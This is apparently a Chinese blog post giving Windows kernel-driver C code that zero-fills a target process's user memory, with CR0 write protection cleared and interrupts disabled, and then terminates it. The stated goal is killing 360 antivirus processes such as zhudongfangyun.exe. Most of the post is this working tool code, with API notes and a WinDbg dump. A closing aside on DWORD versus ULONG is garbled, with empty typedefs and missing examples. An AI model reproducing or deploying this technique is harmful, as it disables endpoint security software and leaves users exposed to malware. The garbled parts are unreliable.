内存填零杀进程
效果：可以杀掉360的傀儡进程 zhudongfangyun.exe，但杀 360tray.exe 时会卡死系统，不清楚 360tray 做了怎样的保护。
.c代码:
PHYSICAL_ADDRESS g_physicalPage; // total reported physical memory in bytes (PhysicalPageSize * NumberOfPhysicalPages); written by DestoryProess before its page walk
/*
 * DestoryProess - zero-fills the user-mode pages of a target process and then
 * terminates it.
 *
 * eproc: an EPROCESS pointer passed as a ULONG; it is cast back to PEPROCESS
 *        for KeAttachProcess and used as the object for ObOpenObjectByPointer.
 *
 * Steps, as written: query SystemBasicInformat and store the total physical
 * memory size in the global g_physicalPage; attach to the target; walk every
 * 0x1000-byte page from 0x1000 up to MmSystemRangeStart; for each page whose
 * physical address is non-zero, below g_physicalPage and maps back to the same
 * virtual address, clear CR0.WP (WPOFF) and RtlZeroMemory the page; detach;
 * open a kernel-mode handle on the process and call ZwTerminateProcess.
 *
 * Returns nothing. A failing ZwQuerySystemInformation or ObOpenObjectByPointer
 * returns early; the result of ZwTerminateProcess is not checked.
 */
VOID DestoryProess(ULONG eproc)
{
ULONG ulEndAddress = (ULONG)MmSystemRangeStart; // exclusive upper bound of the page walk (start of system space)
PHYSICAL_ADDRESS physical_addr;
ULONG ulVirtualAddress;
ULONG AddrTemp;
KIRQL irql;
SYSTEM_BASIC_INFORMATION SysBaseInfo;
NTSTATUS status;
HANDLE ProcessHandle;
dprintf("MmSystemRangeStart:0x%08x\n", ulEndAddress);
// Populates the global g_physicalPage used by the loop below.
status = ZwQuerySystemInformation (SystemBasicInformat, &SysBaseInfo, sizeof (SysBaseInfo), 0);
if (!NT_SUCCESS(status))
{
dprintf("ZwQuerySystemInformation error\n");
return ;
}
// NOTE(review): SysBaseInfo is a struct but %08x expects an integer argument
// (format/argument mismatch); the value printed here is not meaningful.
dprintf("pBasicInfo:0x%08x\n", SysBaseInfo);
// edx:eax = PhysicalPageSize * NumberOfPhysicalPages, i.e. the total bytes of
// physical memory reported; stored as a 64-bit value in g_physicalPage.
__asm mov eax,SysBaseInfo.PhysicalPageSize;
__asm mul SysBaseInfo.NumberOfPhysicalPages;
__asm mov g_physicalPage.HighPart, edx;
__asm mov g_physicalPage.LowPart, eax;
// Switch to the target's address space so the virtual addresses below resolve there.
KeAttachProcess((PEPROCESS)eproc);
// 4 KiB stride over user-mode addresses; page 0 is never touched.
for (ulVirtualAddress = 0x1000;ulVirtualAddress < ulEndAddress; ulVirtualAddress += 0x1000)
{
physical_addr = MmGetPhysicalAddress((PVOID)ulVirtualAddress);
// Two-part 64-bit compare: skip pages whose physical address is at or above g_physicalPage.
if (physical_addr.HighPart > g_physicalPage.HighPart)
{
continue;
}
if ((physical_addr.HighPart == g_physicalPage.HighPart)&&(physical_addr.LowPart >= g_physicalPage.LowPart))
{
continue;
}
// A physical address of 0 is treated as "not mapped".
if ((physical_addr.HighPart | physical_addr.LowPart) ==0)
{
continue;
}
// Round-trip check: only touch pages whose physical address maps back to this virtual address.
AddrTemp = MmGetVirtualForPhysical(physical_addr);
dprintf("ulVirtualAddress:0x%08x, AddrTemp:0x%08x\n",ulVirtualAddress, AddrTemp);
if (AddrTemp != ulVirtualAddress)
{
continue;
}
dprintf("ready for wpoff\n");
// WPOFF raises IRQL to DPC level, clears CR0.WP and disables interrupts;
// WPON undoes that. NOTE(review): RtlZeroMemory therefore runs at an IRQL
// where a page fault cannot be serviced; the checks above appear to be the
// only guard that the page is resident — confirm.
irql = WPOFF();
RtlZeroMemory((PVOID)ulVirtualAddress, 0x1000);
WPON(irql);
}
KeDetachProcess();
// Kernel-mode handle with DesiredAccess 0 and no object-type filter, used only for ZwTerminateProcess.
status = ObOpenObjectByPointer((PVOID)eproc, 0, NULL, 0, NULL, KernelMode, &ProcessHandle);
if (!NT_SUCCESS(status))
{
return ;
}
ZwTerminateProcess(ProcessHandle, STATUS_SUCCESS); // exit status STATUS_SUCCESS; return value not checked
ZwClose(ProcessHandle);
}
/*
 * WPOFF - raise IRQL to DPC level, clear the CR0.WP (write-protect, bit 16)
 * flag and disable interrupts. Returns the previous IRQL for WPON to restore.
 * NOTE(review): cr0 is held in a UINT64 with a 64-bit mask while the rest of
 * this file works with 32-bit addresses; the width __readcr0 returns depends
 * on the target architecture — confirm this matches the build.
 */
KIRQL WPOFF()
{
KIRQL irql=KeRaiseIrqlToDpcLevel();
UINT64 cr0=__readcr0();
cr0 &= 0xfffffffffffeffff; // clear bit 16 (WP)
__writecr0(cr0);
_disable(); // interrupts off after WP has been cleared
return irql;
}
/*
 * WPON - inverse of WPOFF: re-enable interrupts, set CR0.WP (bit 16) and
 * lower IRQL back to the value WPOFF returned.
 * Note the order is not the mirror of WPOFF: interrupts are enabled before
 * the WP bit is written back.
 */
void WPON(KIRQL irql)
{
UINT64 cr0=__readcr0();
cr0 |= 0x10000; // set bit 16 (WP)
_enable();
__writecr0(cr0);
KeLowerIrql(irql);
}
.H文件
VOID DestoryProess(ULONG eproc); // eproc: EPROCESS pointer passed as ULONG; zero-fills the process's user pages, then terminates it
// Minimal project-local SYSTEM_INFORMATION_CLASS: only the first member is
// declared, so SystemBasicInformat takes value 0; it is the class that
// DestoryProess passes to ZwQuerySystemInformation.
typedef enum _SYSTEM_INFORMATION_CLASS
{
SystemBasicInformat
}SYSTEM_INFORMATION_CLASS;
// Buffer layout assumed for the SystemBasicInformat query. DestoryProess reads
// only PhysicalPageSize and NumberOfPhysicalPages.
// NOTE(review): this layout is declared locally rather than taken from an SDK
// header; confirm it matches the target OS before relying on the other fields.
typedef struct _SYSTEM_BASIC_INFORMATION
{
ULONG Unknown;
ULONG MaximumIncrement;
ULONG PhysicalPageSize; // page size in bytes; multiplied by NumberOfPhysicalPages in DestoryProess
ULONG NumberOfPhysicalPages;
ULONG LowestPhysicalPage;
ULONG HighestPhysicalPage;
ULONG AllocationGranularity;
ULONG LowestUserAddress;
ULONG HighestUserAddress;
ULONG ActiveProcessors;
UCHAR NumberProcessors;
}SYSTEM_BASIC_INFORMATION, * PSYSTEM_BASIC_INFORMATION;
// NOTE(review): __readmsr is declared intrinsic here, but the .c file uses
// __readcr0/__writecr0 — confirm the intended set of intrinsics.
#pragma intrinsic(__readmsr)
#pragma intrinsic(_disable)
#pragma intrinsic(_enable)
KIRQL WPOFF(); // raise to DPC level, clear CR0.WP, disable interrupts; returns the previous IRQL
void WPON(KIRQL irql); // inverse of WPOFF
// Local prototypes for the kernel routines DestoryProess calls.
// NOTE(review): declared here with PRKPROCESS while the caller passes a
// PEPROCESS cast; confirm against the DDK header.
VOID
KeAttachProcess ( PRKPROCESS Process
);
void KeDetachProcess();
// Opens a handle on an object given its pointer. DestoryProess passes
// HandleAttributes 0, no access state, DesiredAccess 0, no object type and
// KernelMode.
NTSTATUS ObOpenObjectByPointer(
PVOID Object,
ULONG HandleAttributes,
PACCESS_STATE PassedAccessState,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PHANDLE Handle
);
lkd> dd MmSystemRangeStart
805599d8 80000000 7ffeffff 00000000 00000000
805599e8 00000000 00000000 00000000 00000000
805599f8 00000000 00000000 0000000d 00000000
80559a08 00000000 00000000 00000000 00000000
80559a18 00000000 00000000 00000000 00000000
80559a28 00000000 00000000 00000000 00000000
80559a38 00000000 00000000 00000000 00000000
80559a48 00000000 00000000 00000000 00000000
MmSystemRangeStart 是内核导出的一个常量，指出了系统（内核）线性地址空间的起始位置。从上面的输出可以看出，起始位置是 0x80000000。如何打印出来？
// NOTE(review): DestoryProess uses (ULONG)MmSystemRangeStart, i.e. the
// variable's value; this expression instead dereferences that value as a
// pointer and reads two ULONGs from it — confirm which one is intended.
dprintf("MmSystemRangeStart: 0x%x 0x%x\n", \
*(ULONG*)MmSystemRangeStart, *( (ULONG*)MmSystemRangeStart + 1 ) );
所用到的函数解释:
1. PHYSICAL_ADDRESS MmGetPhysicalAddress( _In_ PVOID BaseAddress );
MmGetPhysicalAddress returns the physical address that corresponds to the given virtual address.
其中 PHYSICAL_ADDRESS 在ntdef.h中有定义:
typedef
LARGE_INTEGER
PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
2.
NTSTATUS ObOpenObjectByPointer( _In_ PVOID Object, _In_ ULONG HandleAttributes, _In_opt_ PACCESS_STATE PassedAccessState, _In_ ACCESS_MASK DesiredAccess, _In_opt_ POBJECT_TYPE ObjectType, _In_ KPROCESSOR_MODE AccessMode, _Out_ PHANDLE Handle );
中间一个小插曲：他的代码中为什么都用 DWORD 类型，而不用 ULONG 类型？实际上两者是完全一样的。
ULONG 与 DWORD 都是 WinDef.h 中定义的宏
typedef
typedef
两者一模一样.
为何我在很多地方看到同时使用这两个类型???
例1,在MSDN中代码:
例2,在winterdom上的代码:
ULONG 偏向于"数值"的概念，即无符号长整型，范围从 0 到 4294967295。
而 DWORD 则偏向于"这种数据类型占 4 字节"的含义，可以拆分成高、低"字"等，通常用作标志（flag）。